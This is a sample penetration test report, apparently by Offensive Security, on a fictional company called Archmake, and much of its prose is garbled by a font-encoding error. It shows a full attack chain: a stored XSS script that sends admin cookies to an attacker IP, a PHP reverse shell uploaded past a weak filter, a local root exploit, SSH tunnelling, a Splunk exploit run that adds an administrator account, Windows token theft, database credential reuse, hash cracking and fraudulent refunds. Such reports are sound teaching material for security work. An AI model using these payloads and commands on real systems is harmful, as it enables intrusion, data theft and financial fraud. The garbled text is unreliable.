!898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.> 18-20120228 CopyrlghL 2012 Cffenslve SecurlLy LLd. All rlghLs reserved. age 1 of 32 -.%/0+12% 3044"56 Cffenslve SecurlLy has been conLracLed Lo conducL a peneLraLlon LesL agalnsL Archmake's exLernal web presence. 1he assessmenL was conducLed ln a manner LhaL slmulaLed a mallclous acLor engaged ln a LargeLed aLLack agalnsL Lhe company wlLh Lhe goals of: o ldenLlfylng lf a remoLe aLLacker could peneLraLe Archmake's defenses. o ueLermlnlng Lhe lmpacL of a securlLy breach on: o 1he lnLegrlLy of Lhe company's order sysLems. o 1he confldenLlallLy of Lhe company's cusLomer lnformaLlon. o 1he lnLernal lnfrasLrucLure and avallablllLy of Archmake's lnformaLlon sysLems. 1he assessmenL was conducLed ln accordance wlLh Lhe recommendaLlons ouLllned ln nlS1 S 800-113 1 . 1he resulLs of Lhls assessmenL wlll be used by Archmake Lo drlve fuLure declslons as Lo Lhe dlrecLlon of Lhelr lnformaLlon securlLy program. All LesLs and acLlons were conducLed under conLrolled condlLlons. 3044"56 '( 7%,0$+, neLwork reconnalssance was conducLed agalnsL Lhe address space provlded by Archmake wlLh Lhe undersLandlng LhaL Lhls space would be consldered Lhe scope for Lhls engagemenL. lL was deLermlned LhaL Lhe company malnLalns a mlnlmal exLernal presence, conslsLlng of an exLernal web slLe and a hosLed mall servlce. 1hls consLlLuLed a small aLLack surface, necesslLaLlng a focus on Lhe prlmary webslLe. Whlle revlewlng Lhe securlLy of Lhe prlmary Archmake webslLe, lL was dlscovered LhaL a vulnerable Wordress plugln was lnsLalled. 1hls plugln was successfully explolLed, leadlng Lo admlnlsLraLlve access Lo Lhe Wordress lnsLallaLlon. 1hls access was uLlllzed Lo obLaln lnLeracLlve access Lo Lhe underlylng operaLlng sysLem, and Lhen escalaLed Lo rooL prlvlleges. Armed wlLh admlnlsLraLlve access Lo Lhe Archmake webserver, Cffenslve SecurlLy was Lhen able Lo ldenLlfy lnLernal neLwork resources. A vulnerablllLy ln an lnLernal sysLem was leveraged Lo galn local sysLem access, whlch was Lhen escalaLed Lo domaln admlnlsLraLor rlghLs. 1hls placed Lhe enLlre lnfrasLrucLure of Lhe neLwork under Lhe conLrol of Lhe aLLackers.
1 hLLp://csrc.nlsL.gov/publlcaLlons/nlsLpubs/800-113/S800-113.pdf !898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.> 18-20120228 CopyrlghL 2012 Cffenslve SecurlLy LLd. All rlghLs reserved. age 2 of 32 Whlle mapplng Lhe lnLernal neLwork, an appllcaLlon was dlscovered LhaL accessed an lnLernal corporaLe daLabase. 1he appllcaLlon was compromlsed, and ln dolng so, allowed Cffenslve SecurlLy Lo galn access Lo Lhe lnLernal daLabase where cusLomer lnformaLlon ls sLored. AddlLlonally, lL was found LhaL Lhls daLabase sysLem manages cusLomer orders. 1hls sysLem was used Lo process reLurns on aLLacker- conLrolled credlL cards, allowlng Cffenslve SecurlLy Lo exLracL funds dlrecLly from Lhe company.
!898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.> 18-20120228 CopyrlghL 2012 Cffenslve SecurlLy LLd. All rlghLs reserved. age 3 of 32 8++"/9 :"55"+12% ;'5<=5%,, -.>$'1+"+1'* Whlle conducLlng dlscovery agalnsL Lhe LargeL sysLems lL was dlscovered LhaL a Wordress 3.3.1 lnsLallaLlon was ln place. Whlle Lhls sysLem was belng revlewed for securlLy lssues, Lhe WScan 2 Lool was used, whlch reporLed LhaL an lnsecure plugln was ln place.
As reporLed by WScan, Lhe 8elevanssl plugln suffered from a Cross-SlLe ScrlpLlng vulnerablllLy 3 , documenLed on Lhe LxplolL uaLabase. 1he aforemenLloned vulnerablllLy was leveraged Lo conducL a Cross-SlLe ScrlpLlng aLLack, wlLh Lhe lnLenL of sLeallng auLhenLlcaLlon cookles from an admlnlsLraLlve user.
2 hLLp://code.google.com/p/wpscan 3 hLLp://www.explolL-db.com/explolLs/16233 ./wpscan.rb --url www.Archmake.com --enumerate p ____________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| v1.1 WordPress Security Scanner by ethicalhack3r.co.uk Sponsored by the RandomStorm Open Source Initiative _____________________________________________________ | URL: http://www.Archmake.com/ | Started on Tue Jan 24 18:44:49 2012 [!] The WordPress theme in use is called "twentyeleven". [!] The WordPress "http://www.Archmake.com/readme.html" file exists. [!] WordPress version 3.3.1 identified from meta generator. [+] Enumerating installed plugins... Checking for 2892 total plugins... 100% complete. [+] We found 2 plugins: Name: relevanssi Location: http://www.Archmake.com/wp-content/plugins/relevanssi/ Directory listing enabled? Yes. Name: relevanssi Location: http://www.Archmake.com/wp-content/plugins/relevanssi/ Directory listing enabled? Yes. [+] There were 1 vulnerabilities identified from the plugin names: [!] Relevanssi 2.7.2 Wordpress Plugin Stored XSS Vulnerability * Reference: http://www.exploit-db.com/exploits/16233/ [+] Finished at Tue Jan 24 18:45:30 2012 !898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.> 18-20120228 CopyrlghL 2012 Cffenslve SecurlLy LLd. All rlghLs reserved. age 4 of 32 1o conducL Lhls aLLack, Cffenslve SecurlLy lnserLed Lhe followlng code lnLo Lhe search bar on Lhe Archmake web slLe:
lor Lhls aLLack Lo properly execuLe, a user logged lnLo Lhe Wordress admlnlsLraLlve lnLerface was requlred Lo access Lhe user Searches" page.
When Lhls page was accessed, Lhe cross-slLe scrlpLlng aLLack was execuLed. 1hls can be verlfled by accesslng Lhe vlew source opLlon on Lhe user Searches" page.
AL Lhe Llme LhaL Lhe user Searches" page was accessed, a remoLe llsLener was runnlng on Lhe aLLacker's machlne. 1hls capLured Lhe logged ln user's auLhenLlcaLlon cookle. <script>new Image().src="http://172.16.40.204/p.php?cookie="+document.cookie; </script> !898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.> 18-20120228 CopyrlghL 2012 Cffenslve SecurlLy LLd. All rlghLs reserved. age 3 of 32
1hls cookle was Lhen manually lnserLed lnLo llrefox uslng a cookle edlLor. 1hls bypassed Lhe logln funcLlon by Lrlcklng Wordress lnLo bellevlng Lhe aLLacker had already successfully auLhenLlcaLed Lo Lhe sysLem.
AfLer reloadlng Lhe web page, lL was verlfled LhaL admlnlsLraLlve access had successfully been obLalned. GET /p.php?cookie=wordpress_ed8a4e5dd813c7b5d262130b08955a6a=admin%7C1328098588 %7C72c3335ad1e783b75bb3d8cf9e85fc9c;%20wp-settings-time- 1=1327925790;%20wordpress_test_cookie=WP+Cookie+check;%20wordpress_logged_i n_ed8a4e5dd813c7b5d262130b08955a6a=admin%7C1328098588%7Caf1bcabca49191de76e c45e798ae5ada;%20wp-settings- 1=editor%3Dhtml;%20wordpress_ed8a4e5dd813c7b5d262130b08955a6a=admin%7C13275 99469%7C3ada64cf8e918c9a4bf148896181fc63;%20wordpress_logged_in_ed8a4e5dd81 3c7b5d262130b08955a6a=admin HTTP/1.1 !898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.> 18-20120228 CopyrlghL 2012 Cffenslve SecurlLy LLd. All rlghLs reserved. age 6 of 32
Cnce Lhls level of admlnlsLraLlve access was obLalned, full conLrol vla Lhe Wordress admlnlsLraLlve lnLerface was posslble. 1hls can resulL ln code execuLlon on Lhe slLe Lhrough mulLlple meLhods, mosL dlrecLly Lhrough Lhe edlLlng of Lhe Wordress Lheme flles, whlch granL access Lo Lhe underlylng P code. 1he lnLegrlLy of Lhe webserver was now compromlsed, wlLh mulLlple escalaLlon paLhs avallable Lo Lhe aLLacker. lor deLalls of Lhe explolLed vulnerablllLy, please see Appendlx A. ;'5<=5%,, =$0?1* @*1*+%*<%< A1$% !6>% @>$'"< Cnce admlnlsLraLlve access Lo Lhe Wordress sysLem had been obLalned, an efforL was Laken Lo ldenLlfy any addlLlonal vulnerablllLles LhaL could be leveraged by an aLLacker. As parL of Lhls efforL, a revlew of Lhe lnsLalled pluglns was made. Whlle conducLlng Lhls revlew, a plugln was ldenLlfled LhaL allowed for Lhe uploadlng of user supplled proflle lmages.
upon revlewlng Lhe source code for Lhls plugln, Cffenslve SecurlLy dlscovered LhaL a regular expresslon conLrols Lhe Lypes of flles LhaL may be uploaded Lo Lhe slLe. !898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.> 18-20120228 CopyrlghL 2012 Cffenslve SecurlLy LLd. All rlghLs reserved. age 7 of 32
1he above secLlon of code from Lhe upload scrlpL checks for allowed flle Lypes ln a flawed manner. 1he regular expresslon performs a slmple sLrlng evaluaLlon, and ls Lhe only LesL used Lo deLermlne Lhe flle Lype of Lhe ob[ecL Lhe user ls aLLempLlng Lo upload. 1he lnLenL of Lhe regex ls Lo maLch a flle name such as Mylmage.png", wlLh Lhls hlghllghLed porLlon of Lhe name equallng Lhe regular expresslon maLch. Powever, flles such as MyLvllllle.png.php" would successfully maLch as well, allowlng Lhe upload of an execuLable scrlpL. lL was declded Lo leverage Lhls vulnerably Lo upload aLLacker-supplled Lools and scrlpLs Lo Lhe LargeLed sysLem. 1here are mulLlple ways LhaL flle Lransfers could be conducLed wlLh Lhe level of access LhaL had been obLalned, however, lL was declded LhaL leveraglng Lhls process had Lhe dual beneflL of demonsLraLlng an exlsLlng vulnerablllLy on Lhe slLe, as well as mlnlmlzlng Lhe changes made Lo Lhe webserver.
1o verlfy LhaL Lhe upload process worked as lnLended, a sLandard graphlc flle was uploaded as a LesL. Cnce Lhls was compleLed successfully, Cffenslve SecurlLy modlfled Lhe name of a P reverse shell (pre- !898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.> 18-20120228 CopyrlghL 2012 Cffenslve SecurlLy LLd. All rlghLs reserved. age 8 of 32 conflgured Lo connecL back Lo an Cffenslve SecurlLy conLrolled sysLem so as Lo noL lnLroduce an addlLlonal securlLy vulnerablllLy) and uploaded lL Lo Lhe sysLem. A llsLener was Lhen run on Lhe aLLacker-conLrolled sysLem and Lhe P reverse shell was accessed, resulLlng ln lnLeracLlve shell access on Lhe remoLe sysLem. 8ecause Lhls shell was runnlng wlLhln Lhe conLexL of Lhe webserver, lL only had mlnlmal sysLem permlsslons.
lor deLalls of Lhe explolLed vulnerablllLy, please see Appendlx A B1*0. B'/"$ =5121$%?% -,/"$"+1'* WlLh lnLeracLlve access Lo Lhe LargeLed webserver obLalned, Lhe nexL ob[ecLlve was Lo galn admlnlsLraLlve access Lo Lhe sysLem. 1he operaLlng sysLem of Lhe webserver was deLermlned Lo be Linux version 2.6.32-5-686 (Debian 2.6.32-38) (ben@decadent.org.uk) (gcc version 4.3.5 (Debian 4.3.5-4) ) #1 SMP Mon Oct 3 04:15:24 UTC 2011". AfLer researchlng poLenLlal aLLack vecLors, lL was dlscovered LhaL Lhe sysLem was vulnerable Lo a race condlLlon ln bzlp2. A publlcly avallable explolL 4 for Lhls vulnerablllLy was found on Lhe LxplolL uaLabase. 1o escalaLe prlvlleges, Lhe explolL was uploaded Lo Lhe sysLem vla Lhe lnsecure upload proflle plcLure plugln.
4 hLLp://www.explolL-db.com/explolLs/18147 root@bt:~# nc -lvp 53 listening on [any] 53 ... connect to [172.16.40.204] from www.Archmake.com [172.16.40.1] 34850 Linux archwww 2.6.32-5-686 #1 SMP Mon Oct 3 04:15:24 UTC 2011 i686 GNU/Linux 10:49:14 up 12 days, 23:47, 2 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT rdole tty7 :0 16Jan12 12days 5:51 0.24s x-session- manag rdole pts/2 :0.0 Tue10 6:01m 0.38s 44.68s gnome- terminal uid=33(www-data) gid=33(www-data) groups=33(www-data) !898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.> 18-20120228 CopyrlghL 2012 Cffenslve SecurlLy LLd. All rlghLs reserved. age 9 of 32
lL was Lhen a sLralghLforward process of decompresslng Lhe execuLable, provldlng execuLe permlsslons, and runnlng Lhe explolL. 1hls resulLed ln rooL level access, allowlng full conLrol of Lhe enLlre webserver.
AL Lhls polnL, Lhe webserver represenLs an lnLernal aLLack plaLform for a mallclous parLy. WlLh full admlnlsLraLlve access now avallable, a mallclous parLy could uLlllze Lhe sysLem for a mulLlLude of purposes, ranglng from aLLacks agalnsL Archmake lLself, Lo aLLacks agalnsL lLs cusLomers. lf Lhls had been a Lrue compromlse, Archmake admlnlsLraLors would noL be able Lo LrusL any daLa on Lhe webserver. lor deLalls of Lhe explolLed vulnerablllLy, please see Appendlx A. $ cd /var/www/wp-content/uploads/2012/02 $ ls race.png.gz race.png.gz $ gunzip race.png.gz $ chmod +x race.png $ ./race.png usage: ./race.png <cmd name> $ ./race.png dd id uid=0(root) gid=33(www-data) groups=0(root),33(www-data) !898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.> 18-20120228 CopyrlghL 2012 Cffenslve SecurlLy LLd. All rlghLs reserved. age 10 of 32 C"1*+"1*1*? 8//%,, +' )'4>5'41,%< ;%#,%52%5 Cnce admlnlsLraLlve access Lo Lhe webserver had been esLabllshed, furLher aLLacks agalnsL Archmake requlred a more sLable connecLlon Lhan whaL was provlded by Lhe P backdoor. upon examlnlng Lhe explolLed webserver, lL was dlscovered LhaL an SSP servlce was runnlng on porL 22000. lL was declded LhaL uslng Lhls servlce was a beLLer soluLlon for esLabllshlng a sLandard meLhod of lnLeracLlon wlLhouL lnLroduclng addlLlonal securlLy vulnerablllLles Lo Lhe sysLem. ln order Lo mlnlmlze changes Lo Lhe sysLem, SSP key-based auLhenLlcaLlon was used for auLhenLlcaLlon raLher Lhan alLerlng or addlng any user accounLs. 1hese keys work as a meLhod of auLhenLlcaLlon Lhrough Lhe use of publlc key crypLography, conslsLlng of a publlc/prlvaLe key palr. 1o enable Lhls access, Lhe aLLacker's publlc key was added Lo Lhe auLhorlzed_keys flle for Lhe rooL user. AddlLlonally, Lhe publlc key of Lhe web server was copled Lo Lhe auLhorlzed_keys flle of Lhe aLLacklng sysLem. WlLh Lhe aforemenLloned auLhenLlcaLlon sysLem ln place, a SSP server was sLarLed on Lhe aLLacker's sysLem on 1C porL 33. We were confldenL LhaL Lhe webserver would be able Lo make ouLbound connecLlons Lo Lhe remoLe sysLem uslng LhaL porL based upon Lhe lnlLlal explolL. lrom Lhe P shell envlronmenL, Lhe command
was execuLed and lnlLlaLed a connecLlon from Lhe vlcLlm's sysLem Lo Lhe aLLacker. AddlLlonally, Lhls creaLed a llsLener on Lhe aLLacker's sysLem LhaL would Lunnel local connecLlons Lo Lhe llsLenlng SSP server on Lhe vlcLlm's sysLem.
ssh -o 'StrictHostKeyChecking no' -R 22000:127.0.0.1:22000 -p 53 172.16.40.204 ping 127.0.0.1 !898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.> 18-20120228 CopyrlghL 2012 Cffenslve SecurlLy LLd. All rlghLs reserved. age 11 of 32 1hls Lunnel was Lhen uLlllzed Lo open a sLandard SSP connecLlon as Lhe rooL user Lo Lhe vlcLlm web server. AddlLlonally, a SCCkS proxy was creaLed beLween Lhe Lwo sysLems, allowlng appllcaLlons on Lhe aLLacker's sysLem Lo access Lhe vlcLlm's neLwork Lhrough Lhe proxy. 1hls has Lhe effecL of maklng all connecLlons appear as lf Lhey are comlng from Lhe vlcLlm's sysLem. 1hls conflguraLlon allowed Lhe aLLacker Lo masquerade as Lhe vlcLlm's sysLem.
lor Lhe purposes of Lhe peneLraLlon LesL, Lhls connecLlon was creaLed manually. ln Lhe lnsLance of a Lrue aLLack, lL ls llkely LhaL Lhe aLLacker would lmplemenL an auLomaLed process Lo re-creaLe Lhe Lunnels lf Lhe connecLlon was broken for any reason. 1hls phase of Lhe aLLack dld noL explolL any vulnerablllLles or Lake advanLage of any newly dlscovered mlsconflguraLlons on Lhe sysLem. lL was slmply Lhe resulL of Lhe level of access LhaL had been obLalned on Lhe sysLem due Lo Lhe success of Lhe prevlous aLLacks. 1hls phase ls where Lhe aLLacker consolldaLed Lhe necessary access and conLrol, Lo furLher peneLraLe Archmake's neLwork. Clearly undersLandlng Lhls aspecL, ls essenLlal ln undersLandlng Lhe scope of Lhe peneLraLlon. D0$*%5"#$% 3>$0*9 E*,+"$$"+1'* Whlle lnspecLlng Lhe conflguraLlon of Lhe compromlsed webserver, references were dlscovered Lo a 10.10.0.x neLwork LhaL appeared Lo be dlrecLly accesslble by Lhe compromlsed sysLem. neLwork reconnalssance sLeps, used Lo dlscover addlLlonal asseLs locaLed on Lhls secondary neLwork, revealed a Splunk server. verslons of Splunk prlor Lo 4.2.3 suffer from a remoLe vulnerablllLy LhaL can be explolLed wlLh a publlcly avallable explolL 3 locaLed on Lhe LxplolL uaLabase. uslng Lhe SCCkS proxy LhaL was prevlously esLabllshed, Cffenslve SecurlLy accessed Lhe web lnLerface of Lhe Splunk lnsLallaLlon, and ldenLlfled LhaL Lhe lnsLalled verslon was 4.2.2, and Lhus, vulnerable Lo aLLack.
3 hLLp://www.explolL-db.com/explolLs/18243 !898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.> 18-20120228 CopyrlghL 2012 Cffenslve SecurlLy LLd. All rlghLs reserved. age 12 of 32
1o conducL Lhe aLLack, Lhe publlc explolL was Lransferred Lo Lhe compromlsed webserver, and Lhen run agalnsL Lhe LargeLed sysLem. 1hls aLLack ls conducLed ln a bllnd manner, resulLlng ln no response back from Lhe execuLed commands. 8ecause Lhe remoLe sysLem was Wlndows-based, lL was declded LhaL an aLLempL would be made Lo creaLe a user accounL on Lhe remoLe sysLem. As Splunk ls ofLen lnsLalled wlLh local S?S1LM prlvlleges, Lhls user would Lhen be added Lo Lhe AdmlnlsLraLors group. !898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.> 18-20120228 CopyrlghL 2012 Cffenslve SecurlLy LLd. All rlghLs reserved. age 13 of 32
1he success of Lhe aLLack was LesLed by aLLempLlng Lo use Lhe newly creaLed accounL Lo esLabllsh an lnLeracLlve sesslon on Lhe LargeLed sysLem vla Wlndows 8emoLe ueskLop. root@archwww:~/exploit# python splunk_exploit.py -h Usage: Run splunk_exploit.py -h to see usage options Options: --version show program's version number and exit -h, --help show this help message and exit -t TARGETHOST IP Address or hostname of target splunk server -c Generate CSRF URL only -f Target is configured to use a Free licence and does not permit remote auth -w SPLUNKWEB_PORT The Splunk admin interface port (Default: 8000) -d SPLUNKD_PORT The Splunkd Web API port (Default: 8089) -u USERFILE File containing usernames for use in dictionary attack -p PASSFILE File containing passwords for use in dictionary attack -U USERNAME Admin username (if known) -P PASSWORD Admin pasword (if known) -e USERPAIR Attempt to add admin user via priv up directory traversal magic. Accepts username:password root@archwww:~/exploit# python splunk_exploit.py -t 10.10.0.3 -f [i] Splunkd server found. Version:4.2.2 [i] OS:Windows 0 6 [i] Splunk web interface discovered [i] CVAL:1480339707 [i] Configured with free licence. No auth required [Payload Options] [1] Pseudo Interactive Shell [2] Perl Reverse Shell [3] Command Exec (Blind) Please select option 1-3:3 blind_shell>net user hacker t00rt00rt00r! /add [i] Executing Command:net user hacker t00rt00rt00r! /add net user hacker t00rt00rt00r! /add blind_shell>net localgroup administrators hacker /add [i] Executing Command:net localgroup administrators hacker /add net localgroup administrators hacker /add !898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.> 18-20120228 CopyrlghL 2012 Cffenslve SecurlLy LLd. All rlghLs reserved. age 14 of 32
WlLh Lhls connecLlon esLabllshed, we verlfled LhaL Lhe creaLed accounL had local admlnlsLraLlve access. AL Lhls polnL, Cffenslve SecurlLy had a level of access equal Lo slLLlng aL Lhe physlcal sysLem console of Lhe newly compromlsed hosL. lor deLalls of Lhe explolLed vulnerablllLy, please see Appendlx A. F'4"1* =5121$%?% -,/"$"+1'* 1o deLermlne Lhe full poLenLlal of Lhls compromlse, an aLLempL was made Lo escalaLe prlvlleges from local admlnlsLraLor Lo domaln admlnlsLraLor. uLlllzlng Lhe compromlsed Splunk server, Cffenslve SecurlLy Lransferred Wlndows CredenLlal LdlLor (WCL) 6 Lo Lhe remoLe sysLem Lhrough Lhe use of Lhe
6 hLLp://www.ampllasecurlLy.com/research/wcefaq.hLml !898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.> 18-20120228 CopyrlghL 2012 Cffenslve SecurlLy LLd. All rlghLs reserved. age 13 of 32 compromlsed webserver. WCL ls a Lool LhaL allows aLLackers Lo make use of Wlndows credenLlals from memory and repurpose Lhem for alLernaLe use. upon lnlLlal Lransfer of Lhe WCL LoolklL Lo Lhe sysLem, lL was dlscovered LhaL Lhe uomaln AdmlnlsLraLor Loken was presenL wlLhln memory.
WlLh Lhls credenLlal ln memory, lL was a slmple maLLer of uslng Lhls Loken Lo execuLe a new command shell LhaL would operaLe wlLh uomaln AdmlnlsLraLor rlghLs. !898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.> 18-20120228 CopyrlghL 2012 Cffenslve SecurlLy LLd. All rlghLs reserved. age 16 of 32
1hls shell was Lhen used Lo run Lhe MlcrosofL ManagemenL Console (MMC) as Lhe uomaln AdmlnlsLraLor. WlLh Lhe MMC loaded, Lhe AcLlve ulrecLory users and CompuLers snap-ln was loaded, glvlng Lhe aLLacker Lhe ablllLy Lo edlL domaln enLlLles. 1hls was uLlllzed Lo creaLe a new neLwork user, whlch was subsequenLly added Lo Lhe uomaln AdmlnlsLraLor's group. !898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.> 18-20120228 CopyrlghL 2012 Cffenslve SecurlLy LLd. All rlghLs reserved. age 17 of 32
1hls new user was capable of accesslng Lhe enLlre Archmake AcLlve ulrecLory domaln, wlLh full rlghLs and prlvlleges. AL Lhls polnL, Lhe lnLegrlLy of Lhe enLlre Wlndows neLwork ls compromlsed. ln Lerms of nexL sLeps, a Lrue aLLacker would have mulLlple Lools aL Lhelr dlsposal, lncludlng: o uLlllzaLlon of Croup ollcy Lo deploy backdoor sofLware on all sysLems. o CompleLe exfllLraLlon of all daLa sLored on any sysLem LhaL uses Wlndows auLhenLlcaLlon. o uesLrucLlon of any and all neLwork resources. o 1argeLed aLLacks agalnsL any and all employees of Archmake, Lhrough Lhe use of lnformaLlon gaLherlng Lools such as keysLroke loggers Lo ldenLlfy personal lnformaLlon. o Leveraglng Lhls sysLemlc access Lo conducL aLLacks agalnsL Archmake suppllers and parLners LhaL malnLaln a LrusL relaLlonshlp wlLh Lhe company. lL was deLermlned LhaL whlle Lhese sLeps would be posslble, Lhey would be consldered ouLslde Lhe scope of Lhe currenL engagemenL. lL was demonsLraLed LhaL a LoLal compromlse of Lhe Archmake domaln had been accompllshed wlLh a compleLe loss of lnLegrlLy for all local sysLems. lor deLalls of Lhe explolLed vulnerablllLy, please see Appendlx A. !898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.> 18-20120228 CopyrlghL 2012 Cffenslve SecurlLy LLd. All rlghLs reserved. age 18 of 32 F"+"#",% )'*+%*+ -.>$'1+"+1'* AfLer Lhe Splunk server was explolLed, an examlnaLlon of lLs local flle sysLems revealed a dlrecLory conLalnlng an execuLable and a CSv flle.
upon lnvesLlgaLlng Lhe CSv flle, lL was found Lo conLaln Archmake's cusLomer lnformaLlon LhaL had been exLracLed from a daLabase server.
!898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.> 18-20120228 CopyrlghL 2012 Cffenslve SecurlLy LLd. All rlghLs reserved. age 19 of 32 lL was deLermlned LhaL Lhls flle was generaLed by Lhe exporLcsv.exe program. 1hls program was examlned Lo obLaln an undersLandlng of lLs lnner worklngs, and Lo deLermlne lf lL conLalned any lnformaLlon LhaL would faclllLaLe access Lo Lhe daLabase server. Whlle vlewlng Lhe program wlLhln a debugger, lL was dlscovered LhaL lL creaLed a dlrecL connecLlon Lo a MlcrosofL SCL server. 1he credenLlals for Lhls connecLlon were hard coded wlLhln Lhe appllcaLlon.
8y maklng use of Lhese credenLlals, lL was posslble Lo make a dlrecL connecLlon Lo Lhe backend daLabase server Lo dlrecLly access Lhe daLa.
1hls access allowed us Lo dlrecLly manlpulaLe all daLa wlLhln Lhe daLabase. !898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.> 18-20120228 CopyrlghL 2012 Cffenslve SecurlLy LLd. All rlghLs reserved. age 20 of 32
uLlllzlng Lhls connecLlon, an exporL of Lhe daLabase was performed. 1hls resulLed ln a slgnlflcanL compromlse of cusLomer daLa. llelds LhaL were exLracLed lncluded: userlu, llrsL and LasL name, L-mall address, Lelephone number, encrypLed password, malllng address, and varlous blLs of user lnformaLlon.
AfLer examlnlng Lhe ouLpuL, lL was deLermlned LhaL Lhe password fleld was composed of Mu3 hashes. 1hese hashes were loaded lnLo an Cffenslve SecurlLy operaLed password cracker. CuL of Lhe 1000 loaded hashes, 996 were recovered Lo clear LexL ln LwenLy Lwo seconds of operaLlon. !898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.> 18-20120228 CopyrlghL 2012 Cffenslve SecurlLy LLd. All rlghLs reserved. age 21 of 32
1he effecL of Lhls amounLs Lo a serlous compromlse. 1he volume of personal lnformaLlon exLracLed from Lhe daLabase, comblned wlLh Lhe common Lendency for password re-use, could slgnlflcanLly lmpacL Lhe cusLomers of Archmake had Lhls been a real aLLack. lor deLalls of Lhe explolLed vulnerablllLy, please see Appendlx A. Hashes: 1002 Unique digests: 1000 Bitmaps: 13 bits, 8192 entries, 0x00001fff mask, 32768 bytes Rules: 1 GPU-Loops: 128 GPU-Accel: 40 Password lengths range: 1 - 15 Platform: AMD compatible platform found Watchdog: Temperature limit set to 90c Device #1: Cayman, 2048MB, 0Mhz, 22MCU Device #2: Cayman, 2048MB, 0Mhz, 22MCU Device #1: Allocating 132MB host-memory Device #1: Kernel ./kernels/4098/m0000_a0.Cayman.64.kernel (1132724 bytes) Device #2: Allocating 132MB host-memory Device #2: Kernel ./kernels/4098/m0000_a0.Cayman.64.kernel (1132724 bytes)
Started: Tue Jan 31 13:43:05 2012 Stopped: Tue Jan 31 13:43:37 2012 !898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.> 18-20120228 CopyrlghL 2012 Cffenslve SecurlLy LLd. All rlghLs reserved. age 22 of 32 8++"/9%5 )'*+5'$ '( 85/G4"9% !5"*,"/+1'*, Whlle conducLlng furLher examlnaLlon of Lhe daLabase backend, we deLermlned LhaL a number of Lables were belng updaLed on a regular basls. 8y monlLorlng Lhe acLlvlLy of Lhese Lables, lL was dlscovered LhaL as orders were enLered lnLo Lhe sysLem, Lhey would be placed lnLo Lhe Lables. Cn a perlodlc basls, anoLher process would Lake acLlon based upon Lhe CaLegory".
1hrough a comblnaLlon of monlLorlng daLabase acLlvlLy, and placlng orders Lhrough Lhe sLandard sysLem, lL was posslble Lo ldenLlfy Lhe purpose of a subseL of CaLegorles.
Cnce a mapplng of LransacLlon Lypes was creaLed, an aLLempL was made Lo manually ln[ecL daLa lnLo Lhls Lable. lL was dlscovered LhaL by ln[ecLlng a valld CusLlu and an aLLacker owned credlL card number wlLh a caLegory of 4 (8efund), an arblLrary amounL of money could be refunded Lo Lhe aLLackers. 1hls was verlfled ln cooperaLlon wlLh Archmake under conLrolled condlLlons. lL ls belleved, buL noL LesLed, LhaL new orders could be placed and shlpped Lo aLLacker creaLed cusLomer enLlLles. 1hls was noL verlfled due Lo Lhe dlsrupLlon lL would cause Lo Lhe Archmake workflow. 8y exerLlng conLrol over Lhe backend daLabase sysLem, lL was posslble Lo have conLrol over Lhe enLlreLy of Lhe Archmake order process. 1hls ls of exLreme lmporLance Lo Archmake, due Lo Lhe amounL of dlsrupLlon lL could cause Lo lLs buslness processes. AddlLlonally, Lhe ablllLy of an aLLacker Lo obLaln dlrecL flnanclal beneflL from Lhls aLLack makes Archmake an exLremely aLLracLlve LargeL. lor deLalls of Lhe explolLed vulnerablllLy, please see Appendlx A. 1 Standard order, Card charged 2 Unknown 3 Rush order, Card charged 4 Refund, Card refunded funds 5 Unknown 6 Internal order !898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.> 18-20120228 CopyrlghL 2012 Cffenslve SecurlLy LLd. All rlghLs reserved. age 23 of 32 )'*/$0,1'* ln Lhe course of Lhe exLernal peneLraLlon LesL, Archmake suffered a cascadlng serles of breaches LhaL led Lo condlLlons LhaL would dlrecLly harm Lhe company as well as lLs cusLomers. 1he speclflc goals of Lhe peneLraLlon LesL were sLaLed as: o ldenLlfy lf a remoLe aLLacker could peneLraLe Archmake's defenses. o ueLermlne Lhe lmpacL of a securlLy breach on: o 1he lnLegrlLy of Lhe company's order sysLems. o 1he confldenLlallLy of Lhe company's cusLomer lnformaLlon. o 1he lnLernal lnfrasLrucLure and avallablllLy of Archmake's lnformaLlon sysLems. 1hese goals of Lhe peneLraLlon LesL were meL. lL was deLermlned LhaL a remoLe aLLacker would be able Lo peneLraLe Archmake's defenses. 1o make Lhls slLuaLlon even worse, Lhe lnlLlal aLLack vecLor can be dlscovered vla auLomaLed scannlng, creaLlng a slLuaLlon where a remoLe aLLack could be lnlLlaLed on a non-LargeLed basls. 1he lmpacL of Lhls peneLraLlon led Lo Lhe compleLe conLrol of Archmake's lnformaLlon sysLems by Lhe aLLacker. Archmake's cusLomer prlvacy was dlrecLly lmpacLed Lhrough Lhe aLLacker's ablllLy Lo obLaln a large amounL of lnformaLlon abouL Lhem, lncludlng clear LexL passwords, Lhrough Lhe use of a bruLe force aLLack. 1hls exposes Lhe cusLomers Lo dlrecL aLLack, whlch could lead Lo flnanclal lmpacL. CusLomer LrusL ln Archmake would be negaLlvely lmpacLed were such an evenL Lo occur. lL was posslble Lo obLaln compleLe and LoLal conLrol over Lhe company order process. 1hls 